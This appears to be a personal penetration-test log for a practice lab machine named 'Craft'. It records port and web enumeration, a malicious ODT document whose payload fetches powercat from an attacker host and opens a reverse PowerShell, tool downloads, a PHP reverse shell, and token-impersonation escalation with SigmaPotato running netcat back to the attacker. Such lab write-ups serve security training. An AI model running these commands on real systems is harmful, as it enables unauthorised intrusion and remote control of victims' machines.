Craft
๐งช Pentest Log: {{date:2025-08-04}}
๐ Target Information
- Machine Name: Craft
- IP Address: 192.168.199.169
- Operating System: Windows
ip=192.168.199.169
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 80
Web Content Enumeration
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
๐ฃ Exploitation / Foothold
Tool / Script Used:
๐ Vulnerability Summary
- Service / Port: 80
- Vulnerability Type: Client Side Attack
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
https://github.com/0bfxgh0st/MMG-LO/
change the mmg-odt.py file
build_payload = (f'IEX(New-Object System.Net.WebClient).DownloadString("http://192.168.45.163/powercat.ps1");powercat -c {ip} -p {port} -e powershell')
python3 mmg-odt.py windows 192.168.45.163 443
Then upload the file to the server, start a python http server waiting for download and another shell handler to catch the reverse connection
python3 /home/kali/Documents/oscp/Shell\ Handler/penelope/penelope.py -p 443
๐งฌ Privilege Escalation
๐ค Current Access
- User: thecybergeek
- Groups: N/A
- Shell Type: reverse shell
๐ Enumeration
winPEASany:
python3 -m http.server 8080
iwr -uri http://192.168.45.163:8080/winPEASany.exe -Outfile winPEASany.exe
found
craft/apache
Upload a php reverse shell to the /htdocs folder, catch it with shell handler
python3 /home/kali/Documents/oscp/Shell\ Handler/penelope/penelope.py -p 80
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Impersonate Token Abuse
- Target Binary/Service: N/A
- Reference / Source: N/A
๐ง Exploit Steps
- Setup
iwr -uri http://192.168.45.163/SigmaPotato.exe -Outfile SigmaPotato.exe
iwr -uri http://192.168.45.163/nc64.exe -Outfile nc64.exe
- Smash to Administrator
./SigmaPotato.exe "nc64.exe 192.168.45.163 80 -e cmd"